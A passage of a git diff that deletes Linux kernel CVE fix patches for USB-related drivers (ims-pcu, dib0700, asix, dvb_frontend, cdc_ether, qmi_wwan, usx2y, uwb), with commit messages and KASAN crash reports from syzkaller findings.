-Date: Sat, 7 Oct 2017 11:07:47 -0700
-Subject: [PATCH] Input: ims-psu - check if CDC union descriptor is sane
-
-Before trying to use CDC union descriptor, try to validate whether that it
-is sane by checking that intf->altsetting->extra is big enough and that
-descriptor bLength is not too big and not too small.
-
-Reported-by: Andrey Konovalov <andreyknvl@google.com>
-Signed-off-by: Dmitry Torokhov <dmitry.torokhov@gmail.com>
----
- drivers/input/misc/ims-pcu.c | 16 ++++++++++++++--
- 1 file changed, 14 insertions(+), 2 deletions(-)
-
-diff --git a/drivers/input/misc/ims-pcu.c b/drivers/input/misc/ims-pcu.c
-index 6bf82ea8c918a..ae473123583bb 100644
---- a/drivers/input/misc/ims-pcu.c
-+++ b/drivers/input/misc/ims-pcu.c
-@@ -1635,13 +1635,25 @@ ims_pcu_get_cdc_union_desc(struct usb_interface *intf)
- 		return NULL;
- 	}
- 
--	while (buflen > 0) {
-+	while (buflen >= sizeof(*union_desc)) {
- 		union_desc = (struct usb_cdc_union_desc *)buf;
- 
-+		if (union_desc->bLength > buflen) {
-+			dev_err(&intf->dev, "Too large descriptor\n");
-+			return NULL;
-+		}
-+
- 		if (union_desc->bDescriptorType == USB_DT_CS_INTERFACE &&
- 		    union_desc->bDescriptorSubType == USB_CDC_UNION_TYPE) {
- 			dev_dbg(&intf->dev, "Found union header\n");
--			return union_desc;
-+
-+			if (union_desc->bLength >= sizeof(*union_desc))
-+				return union_desc;
-+
-+			dev_err(&intf->dev,
-+				"Union descriptor to short (%d vs %zd\n)",
-+				union_desc->bLength, sizeof(*union_desc));
-+			return NULL;
- 		}
- 
- 		buflen -= union_desc->bLength;
diff --git a/Patches/Linux_CVEs/CVE-2017-16646/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-16646/ANY/0001.patch
deleted file mode 100644
index 335e94e7..00000000
--- a/Patches/Linux_CVEs/CVE-2017-16646/ANY/0001.patch
+++ /dev/null
@@ -1,112 +0,0 @@
-diff --git a/drivers/media/usb/dvb-usb/dib0700_devices.c b/drivers/media/usb/dvb-usb/dib0700_devices.c
-index 6020170fe99a..92098c1b78e5 100644
---- a/drivers/media/usb/dvb-usb/dib0700_devices.c
-+++ b/drivers/media/usb/dvb-usb/dib0700_devices.c
-@@ -291,7 +291,7 @@ static int stk7700P2_frontend_attach(struct dvb_usb_adapter *adap)
- 					     stk7700d_dib7000p_mt2266_config)
- 		    != 0) {
- 			err("%s: state->dib7000p_ops.i2c_enumeration failed.  Cannot continue\n", __func__);
--			dvb_detach(&state->dib7000p_ops);
-+			dvb_detach(state->dib7000p_ops.set_wbd_ref);
- 			return -ENODEV;
- 		}
- 	}
-@@ -325,7 +325,7 @@ static int stk7700d_frontend_attach(struct dvb_usb_adapter *adap)
- 					     stk7700d_dib7000p_mt2266_config)
- 		    != 0) {
- 			err("%s: state->dib7000p_ops.i2c_enumeration failed.  Cannot continue\n", __func__);
--			dvb_detach(&state->dib7000p_ops);
-+			dvb_detach(state->dib7000p_ops.set_wbd_ref);
- 			return -ENODEV;
- 		}
- 	}
-@@ -478,7 +478,7 @@ static int stk7700ph_frontend_attach(struct dvb_usb_adapter *adap)
- 				     &stk7700ph_dib7700_xc3028_config) != 0) {
- 		err("%s: state->dib7000p_ops.i2c_enumeration failed.  Cannot continue\n",
- 		    __func__);
--		dvb_detach(&state->dib7000p_ops);
-+		dvb_detach(state->dib7000p_ops.set_wbd_ref);
- 		return -ENODEV;
- 	}
- 
-@@ -1010,7 +1010,7 @@ static int stk7070p_frontend_attach(struct dvb_usb_adapter *adap)
- 				     &dib7070p_dib7000p_config) != 0) {
- 		err("%s: state->dib7000p_ops.i2c_enumeration failed.  Cannot continue\n",
- 		    __func__);
--		dvb_detach(&state->dib7000p_ops);
-+		dvb_detach(state->dib7000p_ops.set_wbd_ref);
- 		return -ENODEV;
- 	}
- 
-@@ -1068,7 +1068,7 @@ static int stk7770p_frontend_attach(struct dvb_usb_adapter *adap)
- 				     &dib7770p_dib7000p_config) != 0) {
- 		err("%s: state->dib7000p_ops.i2c_enumeration failed.  Cannot continue\n",
- 		    __func__);
--		dvb_detach(&state->dib7000p_ops);
-+		dvb_detach(state->dib7000p_ops.set_wbd_ref);
- 		return -ENODEV;
- 	}
- 
-@@ -3056,7 +3056,7 @@ static int nim7090_frontend_attach(struct dvb_usb_adapter *adap)
- 
- 	if (state->dib7000p_ops.i2c_enumeration(&adap->dev->i2c_adap, 1, 0x10, &nim7090_dib7000p_config) != 0) {
- 		err("%s: state->dib7000p_ops.i2c_enumeration failed.  Cannot continue\n", __func__);
--		dvb_detach(&state->dib7000p_ops);
-+		dvb_detach(state->dib7000p_ops.set_wbd_ref);
- 		return -ENODEV;
- 	}
- 	adap->fe_adap[0].fe = state->dib7000p_ops.init(&adap->dev->i2c_adap, 0x80, &nim7090_dib7000p_config);
-@@ -3109,7 +3109,7 @@ static int tfe7090pvr_frontend0_attach(struct dvb_usb_adapter *adap)
- 	/* initialize IC 0 */
- 	if (state->dib7000p_ops.i2c_enumeration(&adap->dev->i2c_adap, 1, 0x20, &tfe7090pvr_dib7000p_config[0]) != 0) {
- 		err("%s: state->dib7000p_ops.i2c_enumeration failed.  Cannot continue\n", __func__);
--		dvb_detach(&state->dib7000p_ops);
-+		dvb_detach(state->dib7000p_ops.set_wbd_ref);
- 		return -ENODEV;
- 	}
- 
-@@ -3139,7 +3139,7 @@ static int tfe7090pvr_frontend1_attach(struct dvb_usb_adapter *adap)
- 	i2c = state->dib7000p_ops.get_i2c_master(adap->dev->adapter[0].fe_adap[0].fe, DIBX000_I2C_INTERFACE_GPIO_6_7, 1);
- 	if (state->dib7000p_ops.i2c_enumeration(i2c, 1, 0x10, &tfe7090pvr_dib7000p_config[1]) != 0) {
- 		err("%s: state->dib7000p_ops.i2c_enumeration failed.  Cannot continue\n", __func__);
--		dvb_detach(&state->dib7000p_ops);
-+		dvb_detach(state->dib7000p_ops.set_wbd_ref);
- 		return -ENODEV;
- 	}
- 
-@@ -3214,7 +3214,7 @@ static int tfe7790p_frontend_attach(struct dvb_usb_adapter *adap)
- 				1, 0x10, &tfe7790p_dib7000p_config) != 0) {
- 		err("%s: state->dib7000p_ops.i2c_enumeration failed.  Cannot continue\n",
- 				__func__);
--		dvb_detach(&state->dib7000p_ops);
-+		dvb_detach(state->dib7000p_ops.set_wbd_ref);
- 		return -ENODEV;
- 	}
- 	adap->fe_adap[0].fe = state->dib7000p_ops.init(&adap->dev->i2c_adap,
-@@ -3309,7 +3309,7 @@ static int stk7070pd_frontend_attach0(struct dvb_usb_adapter *adap)
- 				     stk7070pd_dib7000p_config) != 0) {
- 		err("%s: state->dib7000p_ops.i2c_enumeration failed.  Cannot continue\n",
- 		    __func__);
--		dvb_detach(&state->dib7000p_ops);
-+		dvb_detach(state->dib7000p_ops.set_wbd_ref);
- 		return -ENODEV;
- 	}
- 
-@@ -3384,7 +3384,7 @@ static int novatd_frontend_attach(struct dvb_usb_adapter *adap)
- 					     stk7070pd_dib7000p_config) != 0) {
- 			err("%s: state->dib7000p_ops.i2c_enumeration failed.  Cannot continue\n",
- 			    __func__);
--			dvb_detach(&state->dib7000p_ops);
-+			dvb_detach(state->dib7000p_ops.set_wbd_ref);
- 			return -ENODEV;
- 		}
- 	}
-@@ -3620,7 +3620,7 @@ static int pctv340e_frontend_attach(struct dvb_usb_adapter *adap)
- 
- 	if (state->dib7000p_ops.dib7000pc_detection(&adap->dev->i2c_adap) == 0) {
- 		/* Demodulator not found for some reason? */
--		dvb_detach(&state->dib7000p_ops);
-+		dvb_detach(state->dib7000p_ops.set_wbd_ref);
- 		return -ENODEV;
- 	}
- 
diff --git a/Patches/Linux_CVEs/CVE-2017-16647/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-16647/ANY/0001.patch
deleted file mode 100644
index b7dd63f4..00000000
--- a/Patches/Linux_CVEs/CVE-2017-16647/ANY/0001.patch
+++ /dev/null
@@ -1,22 +0,0 @@
-diff --git a/drivers/net/usb/asix_devices.c b/drivers/net/usb/asix_devices.c
-index b2ff88e69a81..3d4f7959dabb 100644
---- a/drivers/net/usb/asix_devices.c
-+++ b/drivers/net/usb/asix_devices.c
-@@ -626,7 +626,7 @@ static int asix_suspend(struct usb_interface *intf, pm_message_t message)
- 	struct usbnet *dev = usb_get_intfdata(intf);
- 	struct asix_common_private *priv = dev->driver_priv;
- 
--	if (priv->suspend)
-+	if (priv && priv->suspend)
- 		priv->suspend(dev);
- 
- 	return usbnet_suspend(intf, message);
-@@ -678,7 +678,7 @@ static int asix_resume(struct usb_interface *intf)
- 	struct usbnet *dev = usb_get_intfdata(intf);
- 	struct asix_common_private *priv = dev->driver_priv;
- 
--	if (priv->resume)
-+	if (priv && priv->resume)
- 		priv->resume(dev);
- 
- 	return usbnet_resume(intf);
diff --git a/Patches/Linux_CVEs/CVE-2017-16648/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-16648/ANY/0001.patch
deleted file mode 100644
index c9bc20d8..00000000
--- a/Patches/Linux_CVEs/CVE-2017-16648/ANY/0001.patch
+++ /dev/null
@@ -1,182 +0,0 @@
-From b1cb7372fa822af6c06c8045963571d13ad6348b Mon Sep 17 00:00:00 2001
-From: Mauro Carvalho Chehab <mchehab@s-opensource.com>
-Date: Tue, 7 Nov 2017 08:39:39 -0500
-Subject: [PATCH] dvb_frontend: don't use-after-free the frontend struct
-
-dvb_frontend_invoke_release() may free the frontend struct.
-So, the free logic can't update it anymore after calling it.
-
-That's OK, as __dvb_frontend_free() is called only when the
-krefs are zeroed, so nobody is using it anymore.
-
-That should fix the following KASAN error:
-
-The KASAN report looks like this (running on kernel 3e0cc09a3a2c40ec1ffb6b4e12da86e98feccb11 (4.14-rc5+)):
-==================================================================
-BUG: KASAN: use-after-free in __dvb_frontend_free+0x113/0x120
-Write of size 8 at addr ffff880067d45a00 by task kworker/0:1/24
-
-CPU: 0 PID: 24 Comm: kworker/0:1 Not tainted 4.14.0-rc5-43687-g06ab8a23e0e6 #545
-Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Bochs 01/01/2011
-Workqueue: usb_hub_wq hub_event
-Call Trace:
- __dump_stack lib/dump_stack.c:16
- dump_stack+0x292/0x395 lib/dump_stack.c:52
- print_address_description+0x78/0x280 mm/kasan/report.c:252
- kasan_report_error mm/kasan/report.c:351
- kasan_report+0x23d/0x350 mm/kasan/report.c:409
- __asan_report_store8_noabort+0x1c/0x20 mm/kasan/report.c:435
- __dvb_frontend_free+0x113/0x120 drivers/media/dvb-core/dvb_frontend.c:156
- dvb_frontend_put+0x59/0x70 drivers/media/dvb-core/dvb_frontend.c:176
- dvb_frontend_detach+0x120/0x150 drivers/media/dvb-core/dvb_frontend.c:2803
- dvb_usb_adapter_frontend_exit+0xd6/0x160 drivers/media/usb/dvb-usb/dvb-usb-dvb.c:340
- dvb_usb_adapter_exit drivers/media/usb/dvb-usb/dvb-usb-init.c:116
- dvb_usb_exit+0x9b/0x200 drivers/media/usb/dvb-usb/dvb-usb-init.c:132
- dvb_usb_device_exit+0xa5/0xf0 drivers/media/usb/dvb-usb/dvb-usb-init.c:295
- usb_unbind_interface+0x21c/0xa90 drivers/usb/core/driver.c:423
- __device_release_driver drivers/base/dd.c:861
- device_release_driver_internal+0x4f1/0x5c0 drivers/base/dd.c:893
- device_release_driver+0x1e/0x30 drivers/base/dd.c:918
- bus_remove_device+0x2f4/0x4b0 drivers/base/bus.c:565
- device_del+0x5c4/0xab0 drivers/base/core.c:1985
- usb_disable_device+0x1e9/0x680 drivers/usb/core/message.c:1170
- usb_disconnect+0x260/0x7a0 drivers/usb/core/hub.c:2124
- hub_port_connect drivers/usb/core/hub.c:4754
- hub_port_connect_change drivers/usb/core/hub.c:5009
- port_event drivers/usb/core/hub.c:5115
- hub_event+0x1318/0x3740 drivers/usb/core/hub.c:5195
- process_one_work+0xc73/0x1d90 kernel/workqueue.c:2119
- worker_thread+0x221/0x1850 kernel/workqueue.c:2253
- kthread+0x363/0x440 kernel/kthread.c:231
- ret_from_fork+0x2a/0x40 arch/x86/entry/entry_64.S:431
-
-Allocated by task 24:
- save_stack_trace+0x1b/0x20 arch/x86/kernel/stacktrace.c:59
- save_stack+0x43/0xd0 mm/kasan/kasan.c:447
- set_track mm/kasan/kasan.c:459
- kasan_kmalloc+0xad/0xe0 mm/kasan/kasan.c:551
- kmem_cache_alloc_trace+0x11e/0x2d0 mm/slub.c:2772
- kmalloc ./include/linux/slab.h:493
- kzalloc ./include/linux/slab.h:666
- dtt200u_fe_attach+0x4c/0x110 drivers/media/usb/dvb-usb/dtt200u-fe.c:212
- dtt200u_frontend_attach+0x35/0x80 drivers/media/usb/dvb-usb/dtt200u.c:136
- dvb_usb_adapter_frontend_init+0x32b/0x660 drivers/media/usb/dvb-usb/dvb-usb-dvb.c:286
- dvb_usb_adapter_init drivers/media/usb/dvb-usb/dvb-usb-init.c:86
- dvb_usb_init drivers/media/usb/dvb-usb/dvb-usb-init.c:162
- dvb_usb_device_init+0xf73/0x17f0 drivers/media/usb/dvb-usb/dvb-usb-init.c:277
- dtt200u_usb_probe+0xa1/0xe0 drivers/media/usb/dvb-usb/dtt200u.c:155
- usb_probe_interface+0x35d/0x8e0 drivers/usb/core/driver.c:361
- really_probe drivers/base/dd.c:413
- driver_probe_device+0x610/0xa00 drivers/base/dd.c:557
- __device_attach_driver+0x230/0x290 drivers/base/dd.c:653
- bus_for_each_drv+0x161/0x210 drivers/base/bus.c:463
- __device_attach+0x26b/0x3c0 drivers/base/dd.c:710
- device_initial_probe+0x1f/0x30 drivers/base/dd.c:757
- bus_probe_device+0x1eb/0x290 drivers/base/bus.c:523
- device_add+0xd0b/0x1660 drivers/base/core.c:1835
- usb_set_configuration+0x104e/0x1870 drivers/usb/core/message.c:1932
- generic_probe+0x73/0xe0 drivers/usb/core/generic.c:174
- usb_probe_device+0xaf/0xe0 drivers/usb/core/driver.c:266
- really_probe drivers/base/dd.c:413
- driver_probe_device+0x610/0xa00 drivers/base/dd.c:557
- __device_attach_driver+0x230/0x290 drivers/base/dd.c:653
- bus_for_each_drv+0x161/0x210 drivers/base/bus.c:463
- __device_attach+0x26b/0x3c0 drivers/base/dd.c:710
- device_initial_probe+0x1f/0x30 drivers/base/dd.c:757
- bus_probe_device+0x1eb/0x290 drivers/base/bus.c:523
- device_add+0xd0b/0x1660 drivers/base/core.c:1835
- usb_new_device+0x7b8/0x1020 drivers/usb/core/hub.c:2457
- hub_port_connect drivers/usb/core/hub.c:4903
- hub_port_connect_change drivers/usb/core/hub.c:5009
- port_event drivers/usb/core/hub.c:5115
- hub_event+0x194d/0x3740 drivers/usb/core/hub.c:5195
- process_one_work+0xc73/0x1d90 kernel/workqueue.c:2119
- worker_thread+0x221/0x1850 kernel/workqueue.c:2253
- kthread+0x363/0x440 kernel/kthread.c:231
- ret_from_fork+0x2a/0x40 arch/x86/entry/entry_64.S:431
-
-Freed by task 24:
- save_stack_trace+0x1b/0x20 arch/x86/kernel/stacktrace.c:59
- save_stack+0x43/0xd0 mm/kasan/kasan.c:447
- set_track mm/kasan/kasan.c:459
- kasan_slab_free+0x72/0xc0 mm/kasan/kasan.c:524
- slab_free_hook mm/slub.c:1390
- slab_free_freelist_hook mm/slub.c:1412
- slab_free mm/slub.c:2988
- kfree+0xf6/0x2f0 mm/slub.c:3919
- dtt200u_fe_release+0x3c/0x50 drivers/media/usb/dvb-usb/dtt200u-fe.c:202
- dvb_frontend_invoke_release.part.13+0x1c/0x30 drivers/media/dvb-core/dvb_frontend.c:2790
- dvb_frontend_invoke_release drivers/media/dvb-core/dvb_frontend.c:2789
- __dvb_frontend_free+0xad/0x120 drivers/media/dvb-core/dvb_frontend.c:153
- dvb_frontend_put+0x59/0x70 drivers/media/dvb-core/dvb_frontend.c:176
- dvb_frontend_detach+0x120/0x150 drivers/media/dvb-core/dvb_frontend.c:2803
- dvb_usb_adapter_frontend_exit+0xd6/0x160 drivers/media/usb/dvb-usb/dvb-usb-dvb.c:340
- dvb_usb_adapter_exit drivers/media/usb/dvb-usb/dvb-usb-init.c:116
- dvb_usb_exit+0x9b/0x200 drivers/media/usb/dvb-usb/dvb-usb-init.c:132
- dvb_usb_device_exit+0xa5/0xf0 drivers/media/usb/dvb-usb/dvb-usb-init.c:295
- usb_unbind_interface+0x21c/0xa90 drivers/usb/core/driver.c:423
- __device_release_driver drivers/base/dd.c:861
- device_release_driver_internal+0x4f1/0x5c0 drivers/base/dd.c:893
- device_release_driver+0x1e/0x30 drivers/base/dd.c:918
- bus_remove_device+0x2f4/0x4b0 drivers/base/bus.c:565
- device_del+0x5c4/0xab0 drivers/base/core.c:1985
- usb_disable_device+0x1e9/0x680 drivers/usb/core/message.c:1170
- usb_disconnect+0x260/0x7a0 drivers/usb/core/hub.c:2124
- hub_port_connect drivers/usb/core/hub.c:4754
- hub_port_connect_change drivers/usb/core/hub.c:5009
- port_event drivers/usb/core/hub.c:5115
- hub_event+0x1318/0x3740 drivers/usb/core/hub.c:5195
- process_one_work+0xc73/0x1d90 kernel/workqueue.c:2119
- worker_thread+0x221/0x1850 kernel/workqueue.c:2253
- kthread+0x363/0x440 kernel/kthread.c:231
- ret_from_fork+0x2a/0x40 arch/x86/entry/entry_64.S:431
-
-The buggy address belongs to the object at ffff880067d45500
- which belongs to the cache kmalloc-2048 of size 2048
-The buggy address is located 1280 bytes inside of
- 2048-byte region [ffff880067d45500, ffff880067d45d00)
-The buggy address belongs to the page:
-page:ffffea00019f5000 count:1 mapcount:0 mapping:          (null)
-index:0x0 compound_mapcount: 0
-flags: 0x100000000008100(slab|head)
-raw: 0100000000008100 0000000000000000 0000000000000000 00000001000f000f
-raw: dead000000000100 dead000000000200 ffff88006c002d80 0000000000000000
-page dumped because: kasan: bad access detected
-
-Memory state around the buggy address:
- ffff880067d45900: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
- ffff880067d45980: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
- ffff880067d45a00: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
-                   ^
- ffff880067d45a80: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
- ffff880067d45b00: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
-==================================================================
-
-Fixes: ead666000a5f ("media: dvb_frontend: only use kref after initialized")
-
-Reported-by: Andrey Konovalov <andreyknvl@google.com>
-Suggested-by: Matthias Schwarzott <zzam@gentoo.org>
-Tested-by: Andrey Konovalov <andreyknvl@google.com>
-Signed-off-by: Mauro Carvalho Chehab <mchehab@s-opensource.com>
----
- drivers/media/dvb-core/dvb_frontend.c | 7 ++-----
- 1 file changed, 2 insertions(+), 5 deletions(-)
-
-diff --git a/drivers/media/dvb-core/dvb_frontend.c b/drivers/media/dvb-core/dvb_frontend.c
-index d485d5f6cc887..3ad83359098bd 100644
---- a/drivers/media/dvb-core/dvb_frontend.c
-+++ b/drivers/media/dvb-core/dvb_frontend.c
-@@ -150,11 +150,8 @@ static void __dvb_frontend_free(struct dvb_frontend *fe)
- 
- 	dvb_frontend_invoke_release(fe, fe->ops.release);
- 
--	if (!fepriv)
--		return;
--
--	kfree(fepriv);
--	fe->frontend_priv = NULL;
-+	if (fepriv)
-+		kfree(fepriv);
- }
- 
- static void dvb_frontend_free(struct kref *ref)
diff --git a/Patches/Linux_CVEs/CVE-2017-16649/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-16649/ANY/0001.patch
deleted file mode 100644
index 9e18d383..00000000
--- a/Patches/Linux_CVEs/CVE-2017-16649/ANY/0001.patch
+++ /dev/null
@@ -1,13 +0,0 @@
-diff --git a/drivers/net/usb/cdc_ether.c b/drivers/net/usb/cdc_ether.c
-index 3e7a3ac3a362..05dca3e5c93d 100644
---- a/drivers/net/usb/cdc_ether.c
-+++ b/drivers/net/usb/cdc_ether.c
-@@ -230,7 +230,7 @@ int usbnet_generic_cdc_bind(struct usbnet *dev, struct usb_interface *intf)
- 			goto bad_desc;
- 	}
- 
--	if (header.usb_cdc_ether_desc) {
-+	if (header.usb_cdc_ether_desc && info->ether->wMaxSegmentSize) {
- 		dev->hard_mtu = le16_to_cpu(info->ether->wMaxSegmentSize);
- 		/* because of Zaurus, we may be ignoring the host
- 		 * side link address we were given.
diff --git a/Patches/Linux_CVEs/CVE-2017-16650/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-16650/ANY/0001.patch
deleted file mode 100644
index 01ec5a56..00000000
--- a/Patches/Linux_CVEs/CVE-2017-16650/ANY/0001.patch
+++ /dev/null
@@ -1,13 +0,0 @@
-diff --git a/drivers/net/usb/qmi_wwan.c b/drivers/net/usb/qmi_wwan.c
-index 8c3733608271..a4f229edcceb 100644
---- a/drivers/net/usb/qmi_wwan.c
-+++ b/drivers/net/usb/qmi_wwan.c
-@@ -681,7 +681,7 @@ static int qmi_wwan_bind(struct usbnet *dev, struct usb_interface *intf)
- 	}
- 
- 	/* errors aren't fatal - we can live with the dynamic address */
--	if (cdc_ether) {
-+	if (cdc_ether && cdc_ether->wMaxSegmentSize) {
- 		dev->hard_mtu = le16_to_cpu(cdc_ether->wMaxSegmentSize);
- 		usbnet_get_ethernet_addr(dev, cdc_ether->iMACAddress);
- 	}
diff --git a/Patches/Linux_CVEs/CVE-2017-16USB/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-16USB/ANY/0001.patch
deleted file mode 100644
index dfcbd42f..00000000
--- a/Patches/Linux_CVEs/CVE-2017-16USB/ANY/0001.patch
+++ /dev/null
@@ -1,56 +0,0 @@
-From 7682e399485fe19622b6fd82510b1f4551e48a25 Mon Sep 17 00:00:00 2001
-From: Takashi Iwai <tiwai@suse.de>
-Date: Mon, 2 Oct 2017 14:06:43 +0200
-Subject: [PATCH] ALSA: usx2y: Suppress kernel warning at page allocation
- failures
-
-The usx2y driver allocates the stream read/write buffers in continuous
-pages depending on the stream setup, and this may spew the kernel
-warning messages with a stack trace like:
-  WARNING: CPU: 1 PID: 1846 at mm/page_alloc.c:3883
-  __alloc_pages_slowpath+0x1ef2/0x2d70
-  Modules linked in:
-  CPU: 1 PID: 1846 Comm: kworker/1:2 Not tainted
-  ....
-
-It may confuse user as if it were any serious error, although this is
-no fatal error and the driver handles the error case gracefully.
-Since the driver has already some sanity check of the given size (128
-and 256 pages), it can't pass any crazy value.  So it's merely page
-fragmentation.
-
-This patch adds __GFP_NOWARN to each caller for suppressing such
-kernel warnings.  The original issue was spotted by syzkaller.
-
-Reported-by: Andrey Konovalov <andreyknvl@google.com>
-Tested-by: Andrey Konovalov <andreyknvl@google.com>
-Cc: <stable@vger.kernel.org>
-Signed-off-by: Takashi Iwai <tiwai@suse.de>
----
- sound/usb/usx2y/usb_stream.c | 6 ++++--
- 1 file changed, 4 insertions(+), 2 deletions(-)
-
-diff --git a/sound/usb/usx2y/usb_stream.c b/sound/usb/usx2y/usb_stream.c
-index 4dab490807009..e229abd216526 100644
---- a/sound/usb/usx2y/usb_stream.c
-+++ b/sound/usb/usx2y/usb_stream.c
-@@ -191,7 +191,8 @@ struct usb_stream *usb_stream_new(struct usb_stream_kernel *sk,
- 	}
- 
- 	pg = get_order(read_size);
--	sk->s = (void *) __get_free_pages(GFP_KERNEL|__GFP_COMP|__GFP_ZERO, pg);
-+	sk->s = (void *) __get_free_pages(GFP_KERNEL|__GFP_COMP|__GFP_ZERO|
-+					  __GFP_NOWARN, pg);
- 	if (!sk->s) {
- 		snd_printk(KERN_WARNING "couldn't __get_free_pages()\n");
- 		goto out;
-@@ -211,7 +212,8 @@ struct usb_stream *usb_stream_new(struct usb_stream_kernel *sk,
- 	pg = get_order(write_size);
- 
- 	sk->write_page =
--		(void *)__get_free_pages(GFP_KERNEL|__GFP_COMP|__GFP_ZERO, pg);
-+		(void *)__get_free_pages(GFP_KERNEL|__GFP_COMP|__GFP_ZERO|
-+					 __GFP_NOWARN, pg);
- 	if (!sk->write_page) {
- 		snd_printk(KERN_WARNING "couldn't __get_free_pages()\n");
- 		usb_stream_free(sk);
diff --git a/Patches/Linux_CVEs/CVE-2017-16USB/ANY/0003.patch b/Patches/Linux_CVEs/CVE-2017-16USB/ANY/0003.patch
deleted file mode 100644
index e7e332f1..00000000
--- a/Patches/Linux_CVEs/CVE-2017-16USB/ANY/0003.patch
+++ /dev/null
@@ -1,89 +0,0 @@
-From 70e743e4cec3733dc13559f6184b35d358b9ef3f Mon Sep 17 00:00:00 2001
-From: Andrey Konovalov <andreyknvl@google.com>
-Date: Thu, 14 Sep 2017 16:52:59 +0200
-Subject: [PATCH] uwb: ensure that endpoint is interrupt
-
-hwarc_neep_init() assumes that endpoint 0 is interrupt, but there's no
-check for that, which results in a WARNING in USB core code, when a bad
-USB descriptor is provided from a device:
-
-usb 1-1: BOGUS urb xfer, pipe 1 != type 3
-------------[ cut here ]------------
-WARNING: CPU: 0 PID: 3 at drivers/usb/core/urb.c:449 usb_submit_urb+0xf8a/0x11d0
-Modules linked in:
-CPU: 0 PID: 3 Comm: kworker/0:0 Not tainted 4.13.0+ #111
-Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Bochs 01/01/2011
-Workqueue: usb_hub_wq hub_event
-task: ffff88006bdc1a00 task.stack: ffff88006bde8000
-RIP: 0010:usb_submit_urb+0xf8a/0x11d0 drivers/usb/core/urb.c:448
-RSP: 0018:ffff88006bdee3c0 EFLAGS: 00010282
-RAX: 0000000000000029 RBX: ffff8800672a7200 RCX: 0000000000000000
-RDX: 0000000000000029 RSI: ffff88006c815c78 RDI: ffffed000d7bdc6a
-RBP: ffff88006bdee4c0 R08: fffffbfff0fe00ff R09: fffffbfff0fe00ff
-R10: 0000000000000018 R11: fffffbfff0fe00fe R12: 1ffff1000d7bdc7f
-R13: 0000000000000003 R14: 0000000000000001 R15: ffff88006b02cc90
-FS:  0000000000000000(0000) GS:ffff88006c800000(0000) knlGS:0000000000000000
-CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
-CR2: 00007fe4daddf000 CR3: 000000006add6000 CR4: 00000000000006f0
-Call Trace:
- hwarc_neep_init+0x4ce/0x9c0 drivers/uwb/hwa-rc.c:710
- uwb_rc_add+0x2fb/0x730 drivers/uwb/lc-rc.c:361
- hwarc_probe+0x34e/0x9b0 drivers/uwb/hwa-rc.c:858
- usb_probe_interface+0x351/0x8d0 drivers/usb/core/driver.c:361
- really_probe drivers/base/dd.c:385
- driver_probe_device+0x610/0xa00 drivers/base/dd.c:529
- __device_attach_driver+0x230/0x290 drivers/base/dd.c:625
- bus_for_each_drv+0x15e/0x210 drivers/base/bus.c:463
- __device_attach+0x269/0x3c0 drivers/base/dd.c:682
- device_initial_probe+0x1f/0x30 drivers/base/dd.c:729
- bus_probe_device+0x1da/0x280 drivers/base/bus.c:523
- device_add+0xcf9/0x1640 drivers/base/core.c:1703
- usb_set_configuration+0x1064/0x1890 drivers/usb/core/message.c:1932
- generic_probe+0x73/0xe0 drivers/usb/core/generic.c:174
- usb_probe_device+0xaf/0xe0 drivers/usb/core/driver.c:266
- really_probe drivers/base/dd.c:385
- driver_probe_device+0x610/0xa00 drivers/base/dd.c:529
- __device_attach_driver+0x230/0x290 drivers/base/dd.c:625
- bus_for_each_drv+0x15e/0x210 drivers/base/bus.c:463
- __device_attach+0x269/0x3c0 drivers/base/dd.c:682
- device_initial_probe+0x1f/0x30 drivers/base/dd.c:729
- bus_probe_device+0x1da/0x280 drivers/base/bus.c:523
- device_add+0xcf9/0x1640 drivers/base/core.c:1703
- usb_new_device+0x7b8/0x1020 drivers/usb/core/hub.c:2457
- hub_port_connect drivers/usb/core/hub.c:4890
- hub_port_connect_change drivers/usb/core/hub.c:4996
- port_event drivers/usb/core/hub.c:5102
- hub_event+0x23c8/0x37c0 drivers/usb/core/hub.c:5182
- process_one_work+0x9fb/0x1570 kernel/workqueue.c:2097
- worker_thread+0x1e4/0x1350 kernel/workqueue.c:2231
- kthread+0x324/0x3f0 kernel/kthread.c:231
- ret_from_fork+0x25/0x30 arch/x86/entry/entry_64.S:425
-Code: 48 8b 85 30 ff ff ff 48 8d b8 98 00 00 00 e8 8e 93 07 ff 45 89
-e8 44 89 f1 4c 89 fa 48 89 c6 48 c7 c7 a0 e5 55 86 e8 20 08 8f fd <0f>
-ff e9 9b f7 ff ff e8 4a 04 d6 fd e9 80 f7 ff ff e8 60 11 a6
----[ end trace 55d741234124cfc3 ]---
-
-Check that endpoint is interrupt.
-
-Found by syzkaller.
-
-Signed-off-by: Andrey Konovalov <andreyknvl@google.com>
-Cc: stable <stable@vger.kernel.org>
-Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
----
- drivers/uwb/hwa-rc.c | 2 ++
- 1 file changed, 2 insertions(+)
-
-diff --git a/drivers/uwb/hwa-rc.c b/drivers/uwb/hwa-rc.c
-index 35a1e777b4497..9a53912bdfe9f 100644
---- a/drivers/uwb/hwa-rc.c
-+++ b/drivers/uwb/hwa-rc.c
-@@ -825,6 +825,8 @@ static int hwarc_probe(struct usb_interface *iface,
- 
- 	if (iface->cur_altsetting->desc.bNumEndpoints < 1)
- 		return -ENODEV;
-+	if (!usb_endpoint_xfer_int(&iface->cur_altsetting->endpoint[0].desc))
-+		return -ENODEV;
- 
- 	result = -ENOMEM;
- 	uwb_rc = uwb_rc_alloc();
diff --git a/Patches/Linux_CVEs/CVE-2017-16USB/ANY/0004.patch b/Patches/Linux_CVEs/CVE-2017-16USB/ANY/0004.patch
deleted file mode 100644
index d635e950..00000000
--- a/Patches/Linux_CVEs/CVE-2017-16USB/ANY/0004.patch
+++ /dev/null
@@ -1,39 +0,0 @@
